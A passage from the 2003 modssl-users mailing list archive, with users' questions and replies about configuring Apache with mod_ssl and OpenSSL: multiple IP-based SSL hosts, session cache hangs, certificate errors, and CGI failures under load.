 with ESMTP id <0HOL00KUAKAZ05@nammta01.sugar-land.nam.slb.com> for
 modssl-users@modssl.org; Wed, 19 Nov 2003 11:37:54 +0000 (GMT)
Received: by SRV003SNAP with Internet Mail Service (5.5.2653.19)
	id ; Wed, 19 Nov 2003 12:38:02 +0100
Content-return: allowed
Date: Wed, 19 Nov 2003 12:37:10 +0100
From: Zampognaro Sergio 
Subject: OpenSSL and Apache on IBM AIX
To: modssl-users@modssl.org
Message-id: <49FCBDCB40420B409FB4EA8D712CC66DFFCE2A@SRV003SNAP>
MIME-version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-type: multipart/alternative;
 boundary="Boundary_(ID_SZSJv2oGPILVZwGiIzx5SQ)"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zampognaro Sergio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--Boundary_(ID_SZSJv2oGPILVZwGiIzx5SQ)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT

Hi all,
I need an urgent information.

Does anybody know if the OpenSSL (0.9.6l) tool kit and the Apache web server
(2.0.48 and/or 1.3.29) are available on the IBM AIX 5L v5.2 operating
system?

thanks for your help!

regards,
sergio

--Boundary_(ID_SZSJv2oGPILVZwGiIzx5SQ)
Content-type: text/html; charset=iso-8859-1
Content-transfer-encoding: 7BIT






OpenSSL and Apache on IBM AIX




Hi all,

I need an urgent information.




Does anybody know if the OpenSSL (0.9.6l) tool kit and the Apache web server (2.0.48 and/or 1.3.29) are available on the IBM AIX 5L v5.2 operating system?



thanks for your help!




regards,

sergio






--Boundary_(ID_SZSJv2oGPILVZwGiIzx5SQ)--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 24 16:48:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5A1B2A8946; Mon, 24 Nov 2003 16:48:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fbsd.reiteration.net (82-34-179-228.cable.ubr01.sout.blueyonder.co.uk [82.34.179.228])
	by master.modssl.org (Postfix) with ESMTP id E5C9FA8939
	for ; Mon, 24 Nov 2003 16:48:00 +0100 (CET)
Received: from localhost
	([127.0.0.1] helo=fbsd.reiteration.net ident=jfm)
	by fbsd.reiteration.net with esmtp (Exim 4.14)
	id 1AOIwP-000MXD-Mr
	for modssl-users@modssl.org; Mon, 24 Nov 2003 15:47:57 +0000
Received: (from jfm@localhost)
	by fbsd.reiteration.net (8.12.9p2/8.12.9/Submit) id hAOFlqpU086626
	for modssl-users@modssl.org; Mon, 24 Nov 2003 15:47:52 GMT
	(envelope-from jfm)
Date: Mon, 24 Nov 2003 15:47:52 +0000
From: John 
To: modssl-users@modssl.org
Subject: multiple SSL instances with aliased IPs
Message-ID: <20031124154752.GA69867@reiteration.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello modssl-users

I'm stuck... I have an understanding of how apache and ssl works but I
am having troubles in finding a way to set up this server. Most of the
searches I do seem to point to the fact that virtual name based hosting
will not work with multiple ssl. TYhis I understand.

I have a freebsd 4.9-current server running apache+mod_ssl-1.3.29+2.8.16

What I want to accomplish is the following, all on one server:

1. One http-only server serving all my domains.

2. One https server for *each domain* which has its *own IP*

I can easily alias IPs within my range to the servers NIC. This has
alreadu been done. I can also run the virtual name based server, and it
functions fine.

What I don't know how to do, and I haven't found a link for yet, is to 

1. start multiple instances of https, each with its *own config file*

2. make custom ssl certificates *for each SSL server*

Each domain name has its own userspace.

Can anyone help me here?

Thanks

-- 
John - jfm@reiteration.net - http://www.reiteration.net/~jfm
For PGP public key finger jfm@reiteration.net or see webpage
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 24 17:13:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 946A1A8946; Mon, 24 Nov 2003 17:13:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 0D3A7A8939
	for ; Mon, 24 Nov 2003 17:13:08 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id hAOGD6Bj004673
	for ; Mon, 24 Nov 2003 17:13:06 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.10/8.12.10) with ESMTP id hAOGD59g010413
	for ; Mon, 24 Nov 2003 17:13:06 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: multiple SSL instances with aliased IPs
Date: Mon, 24 Nov 2003 17:12:45 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: multiple SSL instances with aliased IPs
Importance: normal
Thread-Index: AcOyopWyY62S+GNXRrunub5jHHDHsgAAWeRw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: John [mailto:lists@reiteration.net]
>
>I'm stuck... I have an understanding of how apache and ssl works but I
>am having troubles in finding a way to set up this server. Most of the
>searches I do seem to point to the fact that virtual name based hosting
>will not work with multiple ssl. TYhis I understand.

Thank goodness...

>I have a freebsd 4.9-current server running=20
>apache+mod_ssl-1.3.29+2.8.16
>What I don't know how to do, and I haven't found a link for yet, is to=20
>1. start multiple instances of https, each with its *own config file*

This is simple enough; you just run httpd with the "-f" switch. This
allows you to define the config file at run-time. So you'd have
something like:

./httpd -f ../conf/ssl_1.conf

where ssl_1.conf contains:

Listen 192.168.1.1:443
DocumentRoot /path/to/ssl_1/docs
SSLCertificateFile /path/to/ssl_cert_1.crt
etc..

And repeat for each SSL host.

Alternatively, you can do all this in your main instance of apache by
using IP-based virtual-Hosts (I'm not sure you're aware of this), eg:

Listen 192.168.1.1:443

  DocumentRoot /path/to/ssl_1/docs
  SSLCertificateFile /path/to/ssl_cert_1.crt
  etc..


Listen 192.168.1.2:443

  DocumentRoot /path/to/ssl_2/docs
  SSLCertificateFile /path/to/ssl_cert_2.crt
  etc..


This won't interfere with your HTTP VHs in the same config (they are all
distinct at the TCP/IP layer).

>2. make custom ssl certificates *for each SSL server*

This is documented, although it's a bit tricky:

- first make your own Certificate Authority cert
(http://www.modssl.org/docs/2.8/ssl_faq.html#ToC29)

- then make a certificate signing request for your site
(http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28) and sign it with the
CA you made above (ie skip the last bit where you send it to Verisign)

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20
>
>Each domain name has its own userspace.
>
>Can anyone help me here?
>
>Thanks
>
>--=20
>John - jfm@reiteration.net - http://www.reiteration.net/~jfm
>For PGP public key finger jfm@reiteration.net or see webpage
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
l'activit=E9 boursi=E8re de la SWX Swiss Exchange.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 25 17:43:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DF2A5A897C; Tue, 25 Nov 2003 17:43:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fbsd.reiteration.net (82-34-179-228.cable.ubr01.sout.blueyonder.co.uk [82.34.179.228])
	by master.modssl.org (Postfix) with ESMTP id DD2D3A8944
	for ; Tue, 25 Nov 2003 17:42:44 +0100 (CET)
Received: from localhost
	([127.0.0.1] helo=fbsd.reiteration.net ident=jfm)
	by fbsd.reiteration.net with esmtp (Exim 4.14)
	id 1AOgGq-000Pjt-Fg
	for modssl-users@modssl.org; Tue, 25 Nov 2003 16:42:36 +0000
Received: (from jfm@localhost)
	by fbsd.reiteration.net (8.12.9p2/8.12.9/Submit) id hAPGgaZW098944
	for modssl-users@modssl.org; Tue, 25 Nov 2003 16:42:36 GMT
	(envelope-from jfm)
Date: Tue, 25 Nov 2003 16:42:36 +0000
From: John 
To: modssl-users@modssl.org
Subject: Re: multiple SSL instances with aliased IPs
Message-ID: <20031125164236.GA87320@reiteration.net>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Nov 24, 2003 at 05:12:45PM +0100, Boyle Owen wrote:

[snip loads]

Many thanks for your quick response. I shall try your suggestions
tonight.

cheers
-- 
John - jfm@reiteration.net - http://www.reiteration.net/~jfm
For PGP public key finger jfm@reiteration.net or see webpage
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 25 22:37:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EEB79A8947; Tue, 25 Nov 2003 22:37:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101])
	by master.modssl.org (Postfix) with ESMTP id 3632FA8940
	for ; Tue, 25 Nov 2003 22:37:23 +0100 (CET)
Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150])
	by e1.ny.us.ibm.com (8.12.10/NS PXFA) with ESMTP id hAPLbLAv266284
	for ; Tue, 25 Nov 2003 16:37:22 -0500
Received: from d25ml06.torolab.ibm.com (d01av02.pok.ibm.com [9.56.224.216])
	by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.6) with ESMTP id hAPLbJje208390
	for ; Tue, 25 Nov 2003 16:37:20 -0500
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: Problems with SSLSessionCache
X-Mailer: Lotus Notes Release 6.5 September 26, 2003
From: Patrick Sweitzer 
Message-ID: 
Date: Tue, 25 Nov 2003 16:37:17 -0500
X-MIMETrack: Serialize by Router on D25ML06/25/M/IBM(Release 6.0.2CF1|June 9, 2003) at
 11/25/2003 16:37:20,
	Serialize complete at 11/25/2003 16:37:20
Content-Type: multipart/alternative; boundary="=_alternative 0076C2DB85256DE9_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Sweitzer 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 0076C2DB85256DE9_=
Content-Type: text/plain; charset="US-ASCII"

Apache setup :

Windows 2000 Server / Apache 2.0.47 / mos_ssl 2.0.48 / OpenSSL 0.9.7c
I have one site responding to HTTP (80) and two virtual hosts responding 
to HTTPS (443) all using separate IP addresses.


I have a question about the SSLSessionCache directive....
The directive was setup to the default "dbm:logs/ssl_scache" but started 
to cause problems...
The HTTP site kept running but both the HTTPS sites would hang....   They 
would initiate the SSL handshaking but would hang at that point.

I was able to get the HTTPS sites to start responding again by deleting 
ssl_scache.pag and ssl_scache.dir

Is this a known problem??

I have since changed the SSLSessionCache directive to none because I 
cannot have it cause all HTTPS sites to hang...
I have read that there is a performance hit for not using 
SSLSessionCache.... 
Does anyone know how much of a performance hit there is?



Cheers,

Patrick Sweitzer
Server Services
patricks@ca.ibm.com
--=_alternative 0076C2DB85256DE9_=
Content-Type: text/html; charset="US-ASCII"



Apache setup :



Windows 2000 Server / Apache 2.0.47
/ mos_ssl 2.0.48 / OpenSSL 0.9.7c

I have one site responding to HTTP (80)
and two virtual hosts responding to HTTPS (443) all using separate IP addresses.





I have a question about the SSLSessionCache
directive....

The directive was setup to the default
"dbm:logs/ssl_scache" but started to cause problems...

The HTTP site kept running but both
the HTTPS sites would hang....   They would initiate the SSL handshaking
but would hang at that point.



I was able to get the HTTPS sites to
start responding again by deleting ssl_scache.pag and ssl_scache.dir



Is this a known problem??



I have since changed the SSLSessionCache
directive to none because I cannot have it cause all HTTPS sites to hang...

I have read that there is a performance
hit for not using SSLSessionCache....  

Does anyone know how much of a performance
hit there is?







Cheers,



Patrick Sweitzer

Server Services

patricks@ca.ibm.com
--=_alternative 0076C2DB85256DE9_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  4 12:45:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3F5EBA8945; Thu,  4 Dec 2003 12:45:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id 9D492A8933
	for ; Thu,  4 Dec 2003 12:44:47 +0100 (CET)
Received: from [80.5.91.122] (account huw.jenkins HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.0.6)
  with ESMTP id 7682095 for modssl-users@modssl.org; Thu, 04 Dec 2003 11:44:46 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Thu, 04 Dec 2003 11:44:43 +0000
Subject: SSL errors in Apache on Mac OS 10.3
From: Huw Jenkins 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi there,

I'm new to this list so apologies if I'm sending this to the wrong place (if
I am can you point me in the right direction?). I'm having problems with
installing an SSL certificate. Moreover I've having difficulty deciphering
the error log, I'm particularly worried about:

OpenSSL: error:0D07207B:asn1 encoding routines:ASN1_get_object:header too
long 

as I understand the rest. I was wondering if one of you wouldn't mind
looking at the log excerpt and telling me what it means/what's going wrong?
The passphrase seems to be correct and I've also run the following commands:

$ openssl x509 -noout -text -in server.crt
$ openssl rsa -noout -text -in server.key

The 'modulus' and the 'public exponent' match exactly. The passphrase is
also correct on the key it asks for it when you run the previous command on
the server.key. To be honest I'm baffled by this!


[03/Dec/2003 17:08:22 12722] [info]  Init: Loading certificate & private key
of SSL-aware server www.eatyergreens.com:16443
[03/Dec/2003 17:08:22 12722] [info]  Init: Requesting pass phrase from
dialog filter program (/etc/httpd/getsslpassphrase)
[03/Dec/2003 17:08:22 12722] [error] Init: Pass phrase incorrect (OpenSSL
library error follows)
[03/Dec/2003 17:08:22 12722] [error] OpenSSL: error:0D07207B:asn1 encoding
routines:ASN1_get_object:header too long


Is this an encoding issue? Or is it just that one of the files has become
corrupt? Or maybe something else that my limited experience with SSL could
never fathom in a million years? ;-)


Thanks

Huw Jenkins

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  4 16:33:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 083B3A8945; Thu,  4 Dec 2003 16:33:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id 0F10AA8933
	for ; Thu,  4 Dec 2003 16:33:03 +0100 (CET)
Received: from [80.5.91.122] (account huw.jenkins HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.0.6)
  with ESMTP id 7686440 for modssl-users@modssl.org; Thu, 04 Dec 2003 15:33:01 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Thu, 04 Dec 2003 15:32:58 +0000
Subject: Re: SSL errors in Apache on Mac OS 10.3
From: Huw Jenkins 
To: 
Message-ID: 
In-Reply-To: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is now fixed. Was a corrupted certificate.

Regards

Huw Jenkins

> From: Huw Jenkins 
> Reply-To: modssl-users@modssl.org
> Date: Thu, 04 Dec 2003 11:44:43 +0000
> To: 
> Subject: SSL errors in Apache on Mac OS 10.3
> 
> Hi there,
> 
> I'm new to this list so apologies if I'm sending this to the wrong place (if
> I am can you point me in the right direction?). I'm having problems with
> installing an SSL certificate. Moreover I've having difficulty deciphering
> the error log, I'm particularly worried about:
> 
> OpenSSL: error:0D07207B:asn1 encoding routines:ASN1_get_object:header too
> long 
> 
> as I understand the rest. I was wondering if one of you wouldn't mind
> looking at the log excerpt and telling me what it means/what's going wrong?
> The passphrase seems to be correct and I've also run the following commands:
> 
> $ openssl x509 -noout -text -in server.crt
> $ openssl rsa -noout -text -in server.key
> 
> The 'modulus' and the 'public exponent' match exactly. The passphrase is
> also correct on the key it asks for it when you run the previous command on
> the server.key. To be honest I'm baffled by this!
> 
> 
> [03/Dec/2003 17:08:22 12722] [info]  Init: Loading certificate & private key
> of SSL-aware server www.eatyergreens.com:16443
> [03/Dec/2003 17:08:22 12722] [info]  Init: Requesting pass phrase from
> dialog filter program (/etc/httpd/getsslpassphrase)
> [03/Dec/2003 17:08:22 12722] [error] Init: Pass phrase incorrect (OpenSSL
> library error follows)
> [03/Dec/2003 17:08:22 12722] [error] OpenSSL: error:0D07207B:asn1 encoding
> routines:ASN1_get_object:header too long
> 
> 
> Is this an encoding issue? Or is it just that one of the files has become
> corrupt? Or maybe something else that my limited experience with SSL could
> never fathom in a million years? ;-)
> 
> 
> Thanks
> 
> Huw Jenkins
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  9 22:43:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DFD2CA8971; Tue,  9 Dec 2003 22:43:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from iplay.net.nz (202.36.205.29.dts.net.nz [202.36.205.29])
	by master.modssl.org (Postfix) with ESMTP id D38E2A8936
	for ; Tue,  9 Dec 2003 22:43:04 +0100 (CET)
Received: from DrewpysLap ([219.89.164.162]) by iplay.net.nz with MailEnable ESMTP; Wed, 10 Dec 2003 10:42:47 +1300
From: "Drew Broadley" 
To: 
Subject: OT: Perl LWP SSL Issue
Date: Wed, 10 Dec 2003 10:42:12 +1300
Message-ID: <001901c3be9d$5af08180$8f450a0a@DrewpysLap>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
Importance: Normal
In-Reply-To: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew Broadley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry for this off-topic issue, but I have tried all the patches and all
the google result suggestions possible.

I am getting in the HEADERS specifically the error:

> Client-SSL-Warning: Peer certificate not verified

I cannot seem to get around this, I have patched https.pm and http.pm in
the LWP library with "sure to fix" solutions but still get this error.

I am using:

$ openssl version
OpenSSL 0.9.7a Feb 19 2003

$ perl -v
This is perl, v5.6.1 built for i386-freebsd

$ lwp-request -v    
This is lwp-request version 2.06 (libwww-perl-5.76)

Any ideas ?

- Drew


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 11 17:22:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CC111A8963; Thu, 11 Dec 2003 17:22:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spiff.wake.tec.nc.us (spiff.wake.tec.nc.us [198.86.245.2])
	by master.modssl.org (Postfix) with ESMTP id 02803A8936
	for ; Thu, 11 Dec 2003 17:22:16 +0100 (CET)
Received: from localhost (dale@localhost) by spiff.wake.tec.nc.us (AIX5.1/8.11.6p2/8.11.0) with ESMTP id hBBGGn940018 for ; Thu, 11 Dec 2003 11:16:50 -0500
Date: Thu, 11 Dec 2003 11:16:48 -0500 (EST)
From: Dale Weaver 
X-Sender: dale@spiff
To: modssl-users@modssl.org
Subject: Problems with Apache SSL under load
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dale Weaver 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I have Apache 1.3.27 compiled with mod SSL using openssl 0.9.6.g
OS=AIX 5.1.

The SSL site stops executing CGI scripts when load gets a little 
high.  I checked the process list and found 106 httpd servers running.
System loads at the UNIX level were nominal (< 0.8).

I get tons of the following error in my error logs:

[Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/navbar1
[Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/navbar2
[Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/register.cgi

HTML page responses are still very fast even with the errors.

Problem does not occur when number of Apache servers < 70.

This is not a great deal of load.  The hardware is capable of handling
a lot more than that.

Can someone point me in the right direction?  Help is greatly appreciated.
Server configs availble on request.  Don't want to send large stuff over
the list.

Thanks.

---------------------------------------------------------------------

Dale Weaver                               deweaver@waketech.edu
UNIX Systems Administrator                (919) 662-3508	
Wake Technical Community College          fax (919) 662-3504

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 11 17:27:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 26AAFA8973; Thu, 11 Dec 2003 17:27:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id A6E92A8936
	for ; Thu, 11 Dec 2003 17:26:58 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id hBBGQuBj006767
	for ; Thu, 11 Dec 2003 17:26:56 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id hBBGQsko023943
	for ; Thu, 11 Dec 2003 17:26:55 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: Problems with Apache SSL under load
Date: Thu, 11 Dec 2003 17:26:54 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: Problems with Apache SSL under load
Thread-Index: AcPAAy+fi89iSsz7QKiy2UMwwiDoFwAADnXQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Dale Weaver [mailto:dale@spiff.wake.tec.nc.us]
>=20
> I have Apache 1.3.27 compiled with mod SSL using openssl 0.9.6.g
> OS=3DAIX 5.1.
>=20
> The SSL site stops executing CGI scripts when load gets a little=20
> high.  I checked the process list and found 106 httpd servers running.
> System loads at the UNIX level were nominal (< 0.8).
>=20
> I get tons of the following error in my error logs:
>=20
> [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource=20
> temporarily unavailable: couldn't spawn child process:=20
> /usr/local/apache/sslcgi/navbar1
> [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource=20
> temporarily unavailable: couldn't spawn child process:=20
> /usr/local/apache/sslcgi/navbar2
> [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource=20
> temporarily unavailable: couldn't spawn child process:=20
> /usr/local/apache/sslcgi/register.cgi

Might be to do with system resources like file descriptors or
semaphores. I'm afraid I don't know where to check these on AIX...

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

>=20
> HTML page responses are still very fast even with the errors.
>=20
> Problem does not occur when number of Apache servers < 70.
>=20
> This is not a great deal of load.  The hardware is capable of handling
> a lot more than that.
>=20
> Can someone point me in the right direction?  Help is greatly=20
> appreciated.
> Server configs availble on request.  Don't want to send large=20
> stuff over
> the list.
>=20
> Thanks.
>=20
> ---------------------------------------------------------------------
>=20
> Dale Weaver                               deweaver@waketech.edu
> UNIX Systems Administrator                (919) 662-3508=09
> Wake Technical Community College          fax (919) 662-3504
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
